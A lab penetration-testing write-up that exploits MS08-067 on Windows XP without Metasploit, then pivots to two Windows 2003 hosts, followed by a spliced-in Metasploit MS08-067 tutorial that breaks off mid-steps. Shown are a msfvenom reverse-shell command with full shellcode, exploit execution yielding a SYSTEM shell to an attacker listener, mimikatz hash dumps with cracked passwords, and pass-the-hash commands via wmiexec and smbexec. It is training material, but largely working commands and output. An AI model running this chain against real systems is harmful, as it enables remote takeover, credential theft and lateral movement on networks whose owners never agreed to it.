139/tcp  open  netbios-ssn
445/tcp  open  microsoft-ds
1025/tcp open  NFS-or-IIS
3389/tcp open  ms-wbt-server
| rdp-vuln-ms12-020: 
|   VULNERABLE:
|   MS12-020 Remote Desktop Protocol Denial Of Service Vulnerability
|     State: VULNERABLE
|     IDs:  CVE:CVE-2012-0152
|     Risk factor: Medium  CVSSv2: 4.3 (MEDIUM) (AV:N/AC:M/Au:N/C:N/I:N/A:P)
|           Remote Desktop Protocol vulnerability that could allow remote attackers to cause a denial of service.
|           
|     Disclosure date: 2012-03-13
|     References:
|       https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2012-0152
|       http://technet.microsoft.com/en-us/security/bulletin/ms12-020
|   
|   MS12-020 Remote Desktop Protocol Remote Code Execution Vulnerability
|     State: VULNERABLE
|     IDs:  CVE:CVE-2012-0002
|     Risk factor: High  CVSSv2: 9.3 (HIGH) (AV:N/AC:M/Au:N/C:C/I:C/A:C)
|           Remote Desktop Protocol vulnerability that could allow remote attackers to execute arbitrary code on the targeted system.
|           
|     Disclosure date: 2012-03-13
|     References:
|       https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2012-0002
|_      http://technet.microsoft.com/en-us/security/bulletin/ms12-020
|_ssl-ccs-injection: No reply from server (TIMEOUT)
|_sslv2-drown: 

Host script results:
|_smb-vuln-ms10-054: false
|_smb-vuln-ms10-061: NT_STATUS_OBJECT_NAME_NOT_FOUND
| smb-vuln-ms17-010: 
|   VULNERABLE:
|   Remote Code Execution vulnerability in Microsoft SMBv1 servers (ms17-010)
|     State: VULNERABLE
|     IDs:  CVE:CVE-2017-0143
|     Risk factor: HIGH
|       A critical remote code execution vulnerability exists in Microsoft SMBv1
|        servers (ms17-010).
|           
|     Disclosure date: 2017-03-14
|     References:
|       https://technet.microsoft.com/en-us/library/security/ms17-010.aspx
|       https://blogs.technet.microsoft.com/msrc/2017/05/12/customer-guidance-for-wannacrypt-attacks/
|_      https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-0143

Nmap scan report for 10.50.97.14
Host is up (0.25s latency).
Not shown: 995 closed ports
PORT     STATE SERVICE
135/tcp  open  msrpc
139/tcp  open  netbios-ssn
445/tcp  open  microsoft-ds
1025/tcp open  NFS-or-IIS
3389/tcp open  ms-wbt-server
| rdp-vuln-ms12-020: 
|   VULNERABLE:
|   MS12-020 Remote Desktop Protocol Denial Of Service Vulnerability
|     State: VULNERABLE
|     IDs:  CVE:CVE-2012-0152
|     Risk factor: Medium  CVSSv2: 4.3 (MEDIUM) (AV:N/AC:M/Au:N/C:N/I:N/A:P)
|           Remote Desktop Protocol vulnerability that could allow remote attackers to cause a denial of service.
|           
|     Disclosure date: 2012-03-13
|     References:
|       https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2012-0152
|       http://technet.microsoft.com/en-us/security/bulletin/ms12-020
|   
|   MS12-020 Remote Desktop Protocol Remote Code Execution Vulnerability
|     State: VULNERABLE
|     IDs:  CVE:CVE-2012-0002
|     Risk factor: High  CVSSv2: 9.3 (HIGH) (AV:N/AC:M/Au:N/C:C/I:C/A:C)
|           Remote Desktop Protocol vulnerability that could allow remote attackers to execute arbitrary code on the targeted system.
|           
|     Disclosure date: 2012-03-13
|     References:
|       https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2012-0002
|_      http://technet.microsoft.com/en-us/security/bulletin/ms12-020
|_ssl-ccs-injection: No reply from server (TIMEOUT)
|_sslv2-drown: 

Host script results:
|_smb-vuln-ms10-054: false
|_smb-vuln-ms10-061: NT_STATUS_OBJECT_NAME_NOT_FOUND
| smb-vuln-ms17-010: 
|   VULNERABLE:
|   Remote Code Execution vulnerability in Microsoft SMBv1 servers (ms17-010)
|     State: VULNERABLE
|     IDs:  CVE:CVE-2017-0143
|     Risk factor: HIGH
|       A critical remote code execution vulnerability exists in Microsoft SMBv1
|        servers (ms17-010).
|           
|     Disclosure date: 2017-03-14
|     References:
|       https://technet.microsoft.com/en-us/library/security/ms17-010.aspx
|       https://blogs.technet.microsoft.com/msrc/2017/05/12/customer-guidance-for-wannacrypt-attacks/
|_      https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-0143

Nmap done: 3 IP addresses (3 hosts up) scanned in 700.95 seconds

Finally. The lab said to start with host 5, now we know why. It’s vulnerable to the infamous MS08-067 exploit. Now the remainder would be easy if we used Metasploit, but let’s avoid that. So I searched for a MS08-067 exploit online which I could use and stumbled on this via this incredible HTB write-up, which I referenced earlier for the manual EternalBlue post.

First we need to generate our payload, using msfvenom. Note the parameters for msfvenom was taken from comments in the exploit. I assume Win XP was mostly 32-bit, but in reality should have the smb-os-discovery script, but will do that later.

root@Kali:~/PTP/2.5_Exploitation/Lab 4# msfvenom -p windows/shell_reverse_tcp LHOST=172.16.5.50 LPORT=443 EXITFUNC=thread -b "x00x0ax0dx5cx5fx2fx2ex40" -f c -a x86 --platform windows
Found 11 compatible encoders
Attempting to encode payload with 1 iterations of x86/shikata_ga_nai
x86/shikata_ga_nai failed with A valid opcode permutation could not be found.
Attempting to encode payload with 1 iterations of generic/none
generic/none failed with Encoding failed due to a bad character (index=3, char=0x00)
Attempting to encode payload with 1 iterations of x86/call4_dword_xor
x86/call4_dword_xor succeeded with size 348 (iteration=0)
x86/call4_dword_xor chosen with final size 348
Payload size: 348 bytes
Final size of c file: 1488 bytes
unsigned char buf[] = 
"x29xc9x83xe9xafxe8xffxffxffxffxc0x5ex81x76x0e"
"x93xf9xe5xe2x83xeexfcxe2xf4x6fx11x67xe2x93xf9"
"x85x6bx76xc8x25x86x18xa9xd5x69xc1xf5x6exb0x87"
"x72x97xcax9cx4exafxc4xa2x06x49xdexf2x85xe7xce"
"xb3x38x2axefx92x3ex07x10xc1xaex6exb0x83x72xaf"
"xdex18xb5xf4x9ax70xb1xe4x33xc2x72xbcxc2x92x2a"
"x6exabx8bx1axdfxabx18xcdx6exe3x45xc8x1ax4ex52"
"x36xe8xe3x54xc1x05x97x65xfax98x1axa8x84xc1x97"
"x77xa1x6exbaxb7xf8x36x84x18xf5xaex69xcbxe5xe4"
"x31x18xfdx6exe3x43x70xa1xc6xb7xa2xbex83xcaxa3"
"xb4x1dx73xa6xbaxb8x18xebx0ex6fxcex91xd6xd0x93"
"xf9x8dx95xe0xcbxbaxb6xfbxb5x92xc4x94x06x30x5a"
"x03xf8xe5xe2xbax3dxb1xb2xfbxd0x65x89x93x06x30"
"xb2xc3xa9xb5xa2xc3xb9xb5x8ax79xf6x3ax02x6cx2c"
"x72x88x96x91x49xf2x96xcbx8dxe0x93xf8x5ex6bx75"
"x93xf5xb4xc4x91x7cx47xe7x98x1ax37x16x39x91xee"
"x6cxb7xedx97x7fx91x15x57x31xafx1ax37xfbx9ax88"
"x86x93x70x06xb5xc4xaexd4x14xf9xebxbcxb4x71x04"
"x83x25xd7xddxd9xe3x92x74xa1xc6x83x3fxe5xa6xc7"
"xa9xb3xb4xc5xbfxb3xacxc5xafxb6xb4xfbx80x29xdd"
"x15x06x30x6bx73xb7xb3xa4x6cxc9x8dxeax14xe4x85"
"x1dx46x42x05xffxb9xf3x8dx44x06x44x78x1dx46xc5"
"xe3x9ex99x79x1ex02xe6xfcx5exa5x80x8bx8ax88x93"
"xaax1ax37";

Now replace the payload in the Python exploit with the shellcode generated above. Before running the exploit we need to know exactly what OS we are dealing with. Comments when running the Python exploit on its own without arguments suggest there are a total of 7 options to choose, for OS and language pack differences

Example: MS08_067_2018.py 192.168.1.1 1 445 -- for Windows XP SP0/SP1 Universal, port 445
Example: MS08_067_2018.py 192.168.1.1 2 139 -- for Windows 2000 Universal, port 139 (445 could also be used)
Example: MS08_067_2018.py 192.168.1.1 3 445 -- for Windows 2003 SP0 Universal
Example: MS08_067_2018.py 192.168.1.1 4 445 -- for Windows 2003 SP1 English
Example: MS08_067_2018.py 192.168.1.1 5 445 -- for Windows XP SP3 French (NX)
Example: MS08_067_2018.py 192.168.1.1 6 445 -- for Windows XP SP3 English (NX)
Example: MS08_067_2018.py 192.168.1.1 7 445 -- for Windows XP SP3 English (AlwaysOn NX)

So let’s run smb-os-discovery

root@Kali:~/PTP/2.5_Exploitation/Lab 4# nmap -sV -Pn -n --script=smb-os-discovery 10.50.97.5,8,14
Starting Nmap 7.70 ( https://nmap.org ) at 2019-03-03 17:36 +08
Nmap scan report for 10.50.97.5
Host is up (0.25s latency).
Not shown: 997 closed ports
PORT    STATE SERVICE      VERSION
135/tcp open  msrpc        Microsoft Windows RPC
139/tcp open  netbios-ssn  Microsoft Windows netbios-ssn
445/tcp open  microsoft-ds Windows XP microsoft-ds
Service Info: OSs: Windows, Windows XP; CPE: cpe:/o:microsoft:windows, cpe:/o:microsoft:windows_xp

Host script results:
| smb-os-discovery: 
|   OS: Windows XP (Windows 2000 LAN Manager)
|   OS CPE: cpe:/o:microsoft:windows_xp::-
|   Computer name: els-winxp
|   NetBIOS computer name: ELS-WINXPx00
|   Workgroup: WORKGROUPx00
|_  System time: 2019-03-03T01:37:33-08:00

Nmap scan report for 10.50.97.8
Host is up (0.25s latency).
Not shown: 995 closed ports
PORT     STATE SERVICE       VERSION
135/tcp  open  msrpc         Microsoft Windows RPC
139/tcp  open  netbios-ssn   Microsoft Windows netbios-ssn
445/tcp  open  microsoft-ds  Windows Server 2003 3790 Service Pack 1 microsoft-ds
1025/tcp open  msrpc         Microsoft Windows RPC
3389/tcp open  ms-wbt-server Microsoft Terminal Service
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows, cpe:/o:microsoft:windows_server_2003

Host script results:
| smb-os-discovery: 
|   OS: Windows Server 2003 3790 Service Pack 1 (Windows Server 2003 5.2)
|   OS CPE: cpe:/o:microsoft:windows_server_2003::sp1
|   Computer name: els-winser2003
|   NetBIOS computer name: ELS-WINSER2003x00
|   Workgroup: WORKGROUPx00
|_  System time: 2019-03-03T01:37:33-08:00

Nmap scan report for 10.50.97.14
Host is up (0.25s latency).
Not shown: 995 closed ports
PORT     STATE SERVICE       VERSION
135/tcp  open  msrpc         Microsoft Windows RPC
139/tcp  open  netbios-ssn   Microsoft Windows netbios-ssn
445/tcp  open  microsoft-ds  Windows Server 2003 3790 Service Pack 1 microsoft-ds
1025/tcp open  msrpc         Microsoft Windows RPC
3389/tcp open  ms-wbt-server Microsoft Terminal Service
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows, cpe:/o:microsoft:windows_server_2003

Host script results:
| smb-os-discovery: 
|   OS: Windows Server 2003 3790 Service Pack 1 (Windows Server 2003 5.2)
|   OS CPE: cpe:/o:microsoft:windows_server_2003::sp1
|   Computer name: els-win03
|   NetBIOS computer name: ELS-WIN03x00
|   Workgroup: WORKGROUPx00
|_  System time: 2019-03-03T01:37:32-08:00

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 3 IP addresses (3 hosts up) scanned in 34.73 seconds

Ok so we know host 5 is Win XP English, but we still don’t know which of the 3 XP options to choose; 1, 6, 7 are valid choices. This is where it gets annoying. If you try an exploit and it fails, it will crash the NBT service and there’s no way to try again without resetting the lab machine. I crashed it at least twice, maybe more (I don’t remember) before it worked.

Option 6 turned out to be the correct one

root@Kali:~/PTP/2.5_Exploitation/Lab 4# python ms08-067-edit.py 10.50.97.5 6 445
#######################################################################
#   MS08-067 Exploit
#   This is a modified verion of Debasis Mohanty's code (https://www.exploit-db.com/exploits/7132/).
#   The return addresses and the ROP parts are ported from metasploit module exploit/windows/smb/ms08_067_netapi
#
#   Mod in 2018 by Andy Acer
#   - Added support for selecting a target port at the command line.
#   - Changed library calls to allow for establishing a NetBIOS session for SMB transport
#   - Changed shellcode handling to allow for variable length shellcode.
#######################################################################


$   This version requires the Python Impacket library version to 0_9_17 or newer.
$
$   Here's how to upgrade if necessary:
$
$   git clone --branch impacket_0_9_17 --single-branch https://github.com/CoreSecurity/impacket/
$   cd impacket
$   pip install .


#######################################################################

Windows XP SP3 English (NX)

[-]Initiating connection
[-]connected to ncacn_np:10.50.97.5[pipebrowser]
Exploit finish

On our listener we have

root@Kali:~/PTP/2.5_Exploitation/Lab 4# nc -nlvp 443
listening on [any] 443 ...
connect to [172.16.5.50] from (UNKNOWN) [10.50.97.5] 1032
Microsoft Windows XP [Version 5.1.2600]
(C) Copyright 1985-2001 Microsoft Corp.

C:WINDOWSsystem32>whoami
whoami
'whoami' is not recognized as an internal or external command,
operable program or batch file.

C:WINDOWSsystem32>ipconfig
ipconfig

Windows IP Configuration


Ethernet adapter Local Area Connection:

        Connection-specific DNS Suffix  . : 
        IP Address. . . . . . . . . . . . : 10.50.97.5
        Subnet Mask . . . . . . . . . . . : 255.255.255.0
        Default Gateway . . . . . . . . . : 10.50.97.1

Great we got a shell, but whoami doesn’t work. Unfortunately neither do the other options

C:WINDOWSsystem32>echo %username%
echo %username%
%username%

C:WINDOWSsystem32>echo %userdomain%
echo %userdomain%
%userdomain%

C:WINDOWSsystem32>set 
set
ALLUSERSPROFILE=C:Documents and SettingsAll Users
CommonProgramFiles=C:Program FilesCommon Files
COMPUTERNAME=ELS-WINXP
ComSpec=C:WINDOWSsystem32cmd.exe
FP_NO_HOST_CHECK=NO
NUMBER_OF_PROCESSORS=1
OS=Windows_NT
Path=C:WINDOWSsystem32;C:WINDOWS;C:WINDOWSSystem32Wbem
PATHEXT=.COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH
PROCESSOR_ARCHITECTURE=x86
PROCESSOR_IDENTIFIER=x86 Family 6 Model 79 Stepping 1, GenuineIntel
PROCESSOR_LEVEL=6
PROCESSOR_REVISION=4f01
ProgramFiles=C:Program Files
PROMPT=$P$G
SystemDrive=C:
SystemRoot=C:WINDOWS
TEMP=C:WINDOWSTEMP
TMP=C:WINDOWSTEMP
USERPROFILE=C:Documents and SettingsNetworkService
windir=C:WINDOWS

So we are left with what we did previously for MS17-010, upload our own whoami.exe and run it.

C:WINDOWSsystem32>copy \172.16.5.50Lab4whoami.exe C:
copy \172.16.5.50Lab4whoami.exe C:
        1 file(s) copied.

C:>whoami.exe
whoami.exe
NT AUTHORITYSYSTEM

So we don’t need to escalate privileges. Now the lab says to dump what hashes we can find and use those to exploit other machines. With meterpreter a hashdump would suffice. Without it, we will need something like mimikatz. Just as before, download it here, the trunk one. Copy it over and dump the hashes as before.

C:mimikatz>mimikatz.exe
mimikatz.exe

  .#####.   mimikatz 2.1.1 (x86) #17763 Dec  9 2018 23:56:27
 .## ^ ##.  "A La Vie, A L'Amour" - (oe.eo) ** Kitten Edition **
 ## /  ##  /*** Benjamin DELPY `gentilkiwi` ( benjamin@gentilkiwi.com )
 ##  / ##       > http://blog.gentilkiwi.com/mimikatz
 '## v ##'       Vincent LE TOUX             ( vincent.letoux@gmail.com )
  '#####'        > http://pingcastle.com / http://mysmartlogon.com   ***/

mimikatz # privilege::debug
Privilege '20' OK

mimikatz # sekurlsa::logonpasswords

Authentication Id : 0 ; 997 (00000000:000003e5)
Session           : Service from 0
User Name         : LOCAL SERVICE
Domain            : NT AUTHORITY
Logon Server      : (null)
Logon Time        : 3/1/2019 2:08:15 PM
SID               : S-1-5-19
	msv :	
	wdigest :	
	kerberos :	
	 * Username : (null)
	 * Domain   : (null)
	 * Password : (null)
	ssp :	
	credman :	

Authentication Id : 0 ; 996 (00000000:000003e4)
Session           : Service from 0
User Name         : NETWORK SERVICE
Domain            : NT AUTHORITY
Logon Server      : (null)
Logon Time        : 3/1/2019 2:08:15 PM
SID               : S-1-5-20
	msv :	
	 [00000002] Primary
	 * Username : ELS-WINXP$
	 * Domain   : WORKGROUP
	 * LM       : aad3b435b51404eeaad3b435b51404ee
	 * NTLM     : 31d6cfe0d16ae931b73c59d7e0c089c0
	 * SHA1     : da39a3ee5e6b4b0d3255bfef95601890afd80709
	wdigest :	
	 * Username : ELS-WINXP$
	 * Domain   : WORKGROUP
	 * Password : (null)
	kerberos :	
	 * Username : ELS-WINXP$
	 * Domain   : WORKGROUP
	 * Password : (null)
	ssp :	
	credman :	

Authentication Id : 0 ; 46095 (00000000:0000b40f)
Session           : UndefinedLogonType from 0
User Name         : (null)
Domain            : (null)
Logon Server      : (null)
Logon Time        : 3/1/2019 2:08:14 PM
SID               : 
	msv :	
	wdigest :	
	kerberos :	
	ssp :	
	credman :	

Authentication Id : 0 ; 999 (00000000:000003e7)
Session           : UndefinedLogonType from 0
User Name         : ELS-WINXP$
Domain            : WORKGROUP
Logon Server      : (null)
Logon Time        : 3/1/2019 2:08:14 PM
SID               : S-1-5-18
	msv :	
	wdigest :	
	kerberos :	
	 * Username : els-winxp$
	 * Domain   : WORKGROUP
	 * Password : (null)
	ssp :	
	credman :

Ok that looks odd. The passwords are all null and there’s only one username. Previously I didn’t suspect anything was wrong because my Win XP runs on a VMware sandbox without login creds. Now this looks odd. So I Googled and found this mimikatz guide. Basically what mimikatz does is dump the SAM and SYSTEM files in C:WindowsSystem32. We can use the mimikatz lsadump command instead.

mimikatz # lsadump::sam
Domain : ELS-WINXP
SysKey : f400d255e6848ea584efcf7a12bb6636
Local SID : S-1-5-21-1715567821-1957994488-1417001333

SAMKey : 36738468e78b813c58f4f308a0e5c1f2

RID  : 000001f4 (500)
User : Administrator
  Hash LM  : 6df60586675b97c51f6252914a7633d7
  Hash NTLM: fc5399dc481550f5442d1585e10c0345

RID  : 000001f5 (501)
User : Guest

RID  : 000003e8 (1000)
User : HelpAssistant
  Hash LM  : a88f7de3e682d17fea34bd03086620b5
  Hash NTLM: 2b07e52daf608f50d4cd9506c5b0220d

RID  : 000003ea (1002)
User : SUPPORT_388945a0
  Hash NTLM: 9f79c84005db73e0122f424022f8dbc0

RID  : 000003ec (1004)
User : netadmin
  Hash LM  : a4fd0910b9418e67d342ec751ef6b28d
  Hash NTLM: 6757a9560a881a505b9fa7bfadd88874

RID  : 000003ed (1005)
User : elsuser
  Hash NTLM: 04820cccb2ea44ad7e60f97961fba7e1

Great we’ve got something. We can either crack the hashes to get the password or just pass the hash. After all we’re dealing with NTLM v1 here with Win XP systems. For the record here’s some of the cracked passwords.

Administrator
fc5399dc481550f5442d1585e10c0345 NTLM eLSAdminPwd 
HelpAssistant
a88f7de3e682d17fea34bd03086620b5 [No Match] 
2b07e52daf608f50d4cd9506c5b0220d NTLM RV@8EhksYn6uoO 
SUPPORT_388945a0
9f79c84005db73e0122f424022f8dbc0 [No Match] 
netadmin
6757a9560a881a505b9fa7bfadd88874 NTLM Congrat0905 
elsuser
04820cccb2ea44ad7e60f97961fba7e1 [No Match]

Let’s try to pass the hash. There are many ways to do this. We can do it with PSexec from PSTools but since we’re on Linux and I didn’t want to spin up my Win XP machine or use the compromised one let’s find alternatives.

The invaluable impacket tool suite let’s us do this with wmiexec. I found out later that you could do it with smbexec too. So let’s try. You will notice that off hand we do not know which of the user account and hashes above are accepted elsewhere. So we have to try them in succession.

root@Kali:~/PTP/2.5_Exploitation/Lab 4# wmiexec.py -hashes :04820cccb2ea44ad7e60f97961fba7e1 elsuser@10.50.97.8
Impacket v0.9.19-dev - Copyright 2019 SecureAuth Corporation

[-] SMB SessionError: STATUS_PASSWORD_MUST_CHANGE(The user password must be changed before logging on the first time.)

root@Kali:~/PTP/2.5_Exploitation/Lab 4# wmiexec.py -hashes :04820cccb2ea44ad7e60f97961fba7e1 elsuser@10.50.97.8
Impacket v0.9.19-dev - Copyright 2019 SecureAuth Corporation

[-] SMB SessionError: STATUS_PASSWORD_MUST_CHANGE(The user password must be changed before logging on the first time.)
root@Kali:~/PTP/2.5_Exploitation/Lab 4# wmiexec.py -hashes :fc5399dc481550f5442d1585e10c0345 Administrator@10.50.97.8Impacket v0.9.19-dev - Copyright 2019 SecureAuth Corporation

[-] SMB SessionError: STATUS_LOGON_FAILURE(The attempted logon is invalid. This is either due to a bad username or authentication information.)
root@Kali:~/PTP/2.5_Exploitation/Lab 4# wmiexec.py -hashes a4fd0910b9418e67d342ec751ef6b28d:6757a9560a881a505b9fa7bfadd88874 netadmin@10.50.97.8
Impacket v0.9.19-dev - Copyright 2019 SecureAuth Corporation

[*] SMBv1 dialect used
[!] Launching semi-interactive shell - Careful what you execute
[!] Press help for extra shell commands
C:>whoami
els-winser2003netadmin
C:>ipconfig

Windows IP Configuration


Ethernet adapter Local Area Connection:

   Connection-specific DNS Suffix  . : 
   IP Address. . . . . . . . . . . . : 10.50.97.8
   Subnet Mask . . . . . . . . . . . : 255.255.255.0
   Default Gateway . . . . . . . . . : 10.50.97.1

Ultimately I found the netadmin one works, which is not so surprising given its name. However, we’re not NT AUTHORITY, sadly. The same hash attack worked with host 14.

root@Kali:~/PTP/2.5_Exploitation/Lab 4# wmiexec.py -hashes a4fd0910b9418e67d342ec751ef6b28d:6757a9560a881a505b9fa7bfadd88874 netadmin@10.50.97.14
Impacket v0.9.19-dev - Copyright 2019 SecureAuth Corporation

[*] SMBv1 dialect used
[!] Launching semi-interactive shell - Careful what you execute
[!] Press help for extra shell commands
C:>ipconfig

Windows IP Configuration


Ethernet adapter Local Area Connection:

   Connection-specific DNS Suffix  . : 
   IP Address. . . . . . . . . . . . : 10.50.97.14
   Subnet Mask . . . . . . . . . . . : 255.255.255.0
   Default Gateway . . . . . . . . . : 10.50.97.1

C:>whoami
els-win03netadmin

At this point I tried to enumerate both hosts with the Powerless.bat enumeration script. Unfortunately the enumeration got cut off at icacls, before the section where it tests for unquoted service paths:

echo --- Program Files and User Directories where everybody (or users) have full or modify permissions --- 
icacls "C:Program Files*" 2>nul | findstr "(F)" | findstr "Everyone" 
...

I also tried PentestMonkey’s Windows-PrivEsc-Chk, but it terminated with an error

C:temp>windows-privesc-check2.exe --audit -a -o report
windows-privesc-check v2.0svn198 (http://pentestmonkey.net/windows-privesc-check)

[i] TSUserEnabled registry value is 0. Excluding TERMINAL SERVER USER

Considering these users to be trusted:
* BUILTINPower Users
* BUILTINAdministrators
* NT AUTHORITYSYSTEM

[i] Running as current user.  No logon creds supplied (-u, -D, -p).

Traceback (most recent call last):
  File "", line 22, in 
  File "windows_privesc_checkbuildpyi.win32windows_privesc_checkoutPYZ1.pyz/wpc.utils", line 614, in populate_scaninfo
  File "windows_privesc_checkbuildpyi.win32windows_privesc_checkoutPYZ1.pyz/os", line 425, in __getitem__
KeyError: 'USERDOMAIN'

Even manually running the cmd to search for unquoted service paths froze for some reason

C:>wmic service get name,displayname,pathname,startmode |findstr /i "Auto" |findstr /i /v "C:Windows\" |findstr /i /v """

Fortunately for us we have another alternative, impacket’s smbexec 

root@Kali:~# smbexec.py -hashes a4fd0910b9418e67d342ec751ef6b28d:6757a9560a881a505b9fa7bfadd88874 netadmin@10.50.97.14
Impacket v0.9.19-dev - Copyright 2019 SecureAuth Corporation

[!] Launching semi-interactive shell - Careful what you execute
C:WINDOWSsystem32>whoami
nt authoritysystem

C:WINDOWSsystem32>exit
root@Kali:~# smbexec.py -hashes a4fd0910b9418e67d342ec751ef6b28d:6757a9560a881a505b9fa7bfadd88874 netadmin@10.50.97.8
Impacket v0.9.19-dev - Copyright 2019 SecureAuth Corporation

[!] Launching semi-interactive shell - Careful what you execute
C:WINDOWSsystem32>whoami
nt authoritysystem

So how does this actually work. Curiously as the blog explains, SMBexec doesn’t actually spawn a process in memory but runs your commands via a batch file, then deletes it and pipes the output to be retrieved via SMB. No wonder it says “semi-interactive shell”!

The Service File Name contains a command string to execute (%COMSPEC% points to the absolute path of cmd.exe). It echos the command to be executed to a bat file, redirects the stdout and stderr to a Temp file, then executes the bat file and deletes it. Back on Kali, the Python script then pulls the output file via SMB and displays the contents in our “pseudo-shell”. For every command we type into our “shell”, a new service is created and the process is repeated. This is why it doesn’t need to drop a binary, it just executes each desired command as a new service. Definitely more stealthy, but as we saw, an event log is created for every command executed. Still a very clever way to get a non-interactive “shell”!

The blog goes into some detail on how to use wmic manually if you’re interested, which wmiexec exploits. It can even be used to run code remotely!

References

https://www.hacklikeapornstar.com/all-pth-techniques/

https://blog.ropnop.com/transferring-files-from-kali-to-windows/#smb

https://alexandreborgesbrazil.files.wordpress.com/2014/09/mimikatz.pdf

https://room362.com/post/2014/2014-04-19-executing-code-via-smb-without-psexec/

Источник

The full name of the MS08-067 vulnerability is «Windows Server Service RPC Request Buffer Overflow Vulnerability.» If a user receives a specially crafted RPC request on an affected system, the vulnerability may allow remote code execution. On Microsoft Windows 2000, Windows XP and Windows Server 2003 systems, attackers may use this vulnerability to run arbitrary code without authentication. This vulnerability can be used to carry out worm attacks.
The following experiment is a local test environment, a Kali host attack machine, and a Windows Xp target machine
Kali attack machine: 192.168.34.220
windows Xp: 192.168.34.189

Step one, start postgresql

root@kali:~# /etc/init.d/postgresql restart
[ ok ] Restarting PostgreSQL 9.1 database server: main.
 Step two, start metasploit
root@kali:~# /etc/init.d/metasploit restart
[ ok ] Stopping Metasploit worker: worker.
[ ok ] Stopping Metasploit web server: thin.
[ ok ] Stopping Metasploit rpc server: prosvc.
[ ok ] Starting Metasploit rpc server: prosvc.
[ ok ] Starting Metasploit web server: thin.
[ ok ] Starting Metasploit worker: worker.
root@kali:~# msfconsole

                 _---------.
             .' #######   ;."
  .---,.    ;@             @@`;   .---,..
." @@@@@'.,'@@            @@@@@',.'@@@@ ".
'[email protected]@@@@@@@@@@@@          @@@@@@@@@@@@@ @;
   `[email protected]@@@@@@@@@@@        @@@@@@@@@@@@@@ .'
     "--'[email protected]@@  [email protected]        @ ,'-   .'--"
          "[email protected]' ; @       @ `.  ;'
            |@@@@ @@@     @    .
             ' @@@ @@   @@    ,
              `[email protected]@@@    @@   .
                ',@@     @   ;           _____________
                 (   3 C    )     /|___ / Metasploit! 
                 ;@'. __*__,."    |--- _____________/
                  '(.,...."/
Trouble managing data? List, sort, group, tag and search your pentest data
in Metasploit Pro -- learn more on http://rapid7.com/metasploit
       =[ metasploit v4.11.4-2015071402                   ]
+ -- --=[ 1476 exploits - 931 auxiliary - 246 post        ]
+ -- --=[ 432 payloads - 37 encoders - 8 nops             ]
+ -- --=[ Free Metasploit Pro trial: http://r-7.co/trymsp ]

Step 3: Check the data connection status

msf &gt; db_status 
[*] postgresql connected to msf3

Step 4. Start nmap scan

msf &gt; db_nmap -sS -sV -O --script=smb-check-vulns.nse -n 192.168.34.189
[*] Nmap: Starting Nmap 6.47 ( http://nmap.org ) at 2015-09-24 14:39 CST
[*] Nmap: Nmap scan report for 192.168.34.189
[*] Nmap: Host is up (0.0082s latency).
[*] Nmap: Not shown: 989 closed ports
[*] Nmap: PORT     STATE SERVICE         VERSION
[*] Nmap: 25/tcp   open  smtp            Microsoft ESMTP 6.0.2600.5512
[*] Nmap: 80/tcp   open  http            Microsoft IIS httpd 5.1
[*] Nmap: 135/tcp  open  msrpc           Microsoft Windows RPC
[*] Nmap: 139/tcp  open  netbios-ssn
[*] Nmap: 443/tcp  open  https?
[*] Nmap: 445/tcp  open  microsoft-ds    Microsoft Windows XP microsoft-ds
[*] Nmap: 777/tcp  open  multiling-http?
[*] Nmap: 1025/tcp open  msrpc           Microsoft Windows RPC
[*] Nmap: 6002/tcp open  http            SafeNet Sentinel License Monitor httpd 7.3
[*] Nmap: 7001/tcp open  afs3-callback?
[*] Nmap: 7002/tcp open  http            SafeNet Sentinel Keys License Monitor httpd 1.0 (Java Console)
[*] Nmap: 1 service unrecognized despite returning data. If you know the service/version, please submit the following fingerprint at http://www.insecure.org/cgi-bin/servicefp-submit.cgi :
[*] Nmap: SF-Port777-TCP:V=6.47%I=7%D=9/24%Time=56039AF6%P=x86_64-unknown-linux-gnu%
[*] Nmap: SF:r(Kerberos,5,"x01txe0x06")%r(SMBProgNeg,5,"x01txe0x06")%r(T
[*] Nmap: SF:erminalServer,A,"x01txe0x06x01txe0x06")%r(WMSRequest,5,"x0
[*] Nmap: SF:1txe0x06");
[*] Nmap: MAC Address: 00:0C:29:84:07:87 (VMware)
[*] Nmap: Device type: general purpose
[*] Nmap: Running: Microsoft Windows XP
[*] Nmap: OS CPE: cpe:/o:microsoft:windows_xp::sp2 cpe:/o:microsoft:windows_xp::sp3
[*] Nmap: OS details: Microsoft Windows XP SP2 or SP3
[*] Nmap: Network Distance: 1 hop
[*] Nmap: Service Info: Host: dh-ca8822ab9589; OS: Windows; CPE: cpe:/o:microsoft:windows
[*] Nmap: Host script results:
[*] Nmap: | smb-check-vulns:
[*] Nmap: |   MS08-067: CHECK DISABLED (add '--script-args=unsafe=1' to run)
[*] Nmap: |   Conficker: Likely CLEAN
[*] Nmap: |   regsvc DoS: CHECK DISABLED (add '--script-args=unsafe=1' to run)
[*] Nmap: |   SMBv2 DoS (CVE-2009-3103): CHECK DISABLED (add '--script-args=unsafe=1' to run)
[*] Nmap: |   MS06-025: CHECK DISABLED (add '--script-args=unsafe=1' to run)
[*] Nmap: |_  MS07-029: CHECK DISABLED (add '--script-args=unsafe=1' to run)
[*] Nmap: OS and Service detection performed. Please report any incorrect results at http://nmap.org/submit/ .
[*] Nmap: Nmap done: 1 IP address (1 host up) scanned in 169.76 seconds

Step 5, search for vulnerability modules

msf &gt; search ms08-067
Matching Modules
================
   Name                                 Disclosure Date  Rank   Description
   ----                                 ---------------  ----   -----------
   exploit/windows/smb/ms08_067_netapi  2008-10-28       great  MS08-067 Microsoft Server Service Relative Path Stack Corruption
msf &gt; use exploit/windows/smb/ms08_067_netapi
Step 6, view configuration options
msf exploit(ms08_067_netapi) &gt; show options 
Module options (exploit/windows/smb/ms08_067_netapi):
   Name     Current Setting  Required  Description
   ----     ---------------  --------  -----------
   RHOST                     yes       The target address
   RPORT    445              yes       Set the SMB service port
   SMBPIPE  BROWSER          yes       The pipe name to use (BROWSER, SRVSVC)
Exploit target:
   Id  Name
   --  ----
   0   Automatic Targeting

Step seven, configuration parameters

